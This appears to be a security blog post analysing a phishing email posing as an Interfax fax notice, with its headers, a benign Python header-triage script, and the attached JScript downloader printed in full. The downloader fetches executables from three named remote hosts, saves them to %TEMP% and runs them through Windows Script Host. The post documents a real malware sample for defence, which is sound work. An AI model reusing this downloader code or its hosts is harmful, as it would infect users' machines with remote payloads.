Today Sebastian opened his mailbox and saw a new email pop up: "You have received fax, document 00311594 from incoming@interfax.net", with a file attached. Let's have a closer look at it :)
First of all, here's a screenshot of the email:
Let’s go on and have a look at the headers:
Received: from unknown (HELO br184.hostgator.com.br) (192.185.176.27)
[..]
From: "Interfax" <incoming@interfax.net>
Reply-To: "Interfax" <incoming@interfax.net>
[..]
X-PHP-Script: www.temnoboqueirao.com.br/post.php for 213.198.53.247
[..]
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - br184.hostgator.com.br
X-AntiAbuse: Original Domain - internetwache.org
X-AntiAbuse: Originator/Caller UID/GID - [30210 500] / [47 12]
X-AntiAbuse: Sender Address Domain - br184.hostgator.com.br
X-BWhitelist: no
X-Source-IP:
X-Exim-ID: 1Zskih-0002l3-D7
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php /home/temno589/public_html/post.php
X-Source-Dir: temnoboqueirao.com.br:/public_html
X-Source-Sender:
X-Source-Auth: temno589
X-Email-Count: 259
X-Source-Cap: dGVtbm81ODk7dGVtbm81ODk7YnIxODQuaG9zdGdhdG9yLmNvbS5icg==
We've notified HostGator about this probably compromised hosting account. Someone seems to be using a simple PHP script to send out spam. Interestingly, interfax.net has an SPF record, so we're wondering why our hoster did not reject this email.
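As an added example (not part of the original post), the following Python script triages the header excerpt quoted above: it pulls the connecting IP out of the Received header, decodes X-Source-Cap, and evaluates the IP against an SPF record. The header excerpt is constructed from the values shown in the post, and the SPF record is a constructed placeholder (not interfax.net's real record) chosen to show how a "-all" policy would yield "fail" for this message.

```python
import base64
import ipaddress
import re

# Constructed excerpt of the headers quoted above (values copied from the post).
RAW_HEADERS = """\
Received: from unknown (HELO br184.hostgator.com.br) (192.185.176.27)
From: "Interfax" <incoming@interfax.net>
X-Source-Cap: dGVtbm81ODk7dGVtbm81ODk7YnIxODQuaG9zdGdhdG9yLmNvbS5icg==
"""
# Constructed SPF record for illustration; NOT interfax.net's real record.
CONSTRUCTED_SPF = "v=spf1 ip4:203.0.113.0/24 -all"
QUALIFIER_RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}

def parse_headers(raw):
    headers = {}  # name -> list of values (excerpt has no folded lines)
    for line in raw.splitlines():
        name, _, value = line.partition(":")
        headers.setdefault(name.strip(), []).append(value.strip())
    return headers

def connecting_ip(received):
    # the last parenthesised IPv4 literal is the host that connected to us
    found = re.findall(r"\((\d{1,3}(?:\.\d{1,3}){3})\)", received)
    return found[-1] if found else None

def spf_verdict(record, ip):
    # Evaluates ip4/ip6/all terms only; include, a, mx and redirect need DNS.
    addr = ipaddress.ip_address(ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIER_RESULT:
            qualifier, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        if mech == "all" or (mech in ("ip4", "ip6")
                             and addr in ipaddress.ip_network(arg, strict=False)):
            return QUALIFIER_RESULT[qualifier]
    return "neutral"  # record exhausted without a match

def triage(raw=RAW_HEADERS, spf_record=CONSTRUCTED_SPF):
    h = parse_headers(raw)
    ip = connecting_ip(h["Received"][0])
    sender = re.search(r"<[^@>]+@([^>]+)>", h["From"][0]).group(1).lower()
    # X-Source-Cap is plain base64: hosting account and sending host
    cap = base64.b64decode(h["X-Source-Cap"][0]).decode()
    return {"ip": ip, "from_domain": sender,
            "spf": spf_verdict(spf_record, ip), "source_cap": cap}
```

Note that real SPF is evaluated against the envelope sender (MAIL FROM) and HELO identity, not the From header, so a receiving MTA would also need the envelope data that these headers alone do not show.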
The attached file is a JavaScript (.js) file with the following contents:
// three download hosts, tried in order
var b = "j-hsu.com kennedy.sitoserver.com arivusampark.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
// drop path: %TEMP%\499925<n>.exe (92 is the backslash)
var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"499925";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n=1; n<=3; n++) {
    for (var i=ld; i<b.length; i++) {
        var dn = 0;
        try {
            // "str" is used but not defined in the excerpt shown here
            xo.open("GET","http://"+b[i]+"/counter/?id="+str+"&rnd=339019"+n, false);
            xo.send();
            if (xo.status == 200) {
                xa.open();
                xa.type = 1; // binary stream
                xa.write(xo.responseBody);
                if (xa.size > 1000) { // ignore error pages / empty replies
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn+n+".exe",2);
                    try {
                        ws.Run(fn+n+".exe",1,0);
                    } catch (er) { };
                };
                xa.close();
            };
            if (dn == 1) {
                ld = i; // keep using the host that worked
                break;
            };
        } catch (er) { };
    };
};
WScript is the root object of the Windows Script Host. Through it the script creates a WshShell object, which can be used to run programs locally. It's already obvious where this is going... The script tries to download three different files (rnd=3390191, 3390192, 3390193) from the three hosts in the b array and executes them afterwards. The sizes of the downloaded files:
$> du -sb drop.exe.rev.*
234018 drop.exe.rev.1
235008 drop.exe.rev.2
467456 drop.exe.rev.3
Neither of us is into reverse engineering, so we decided to upload the files to virustotal.com. Most AVs did not detect the files as malicious (date: 1st of November 2015):
We’ve also submitted one sample to Anubis and Malwr.com, but it takes ages for them to analyse it.
That's all there is to it. Nothing special, but Sebastian was just curious about it. However, it's interesting and new to us that Windows seems to execute JavaScript (.js) files directly.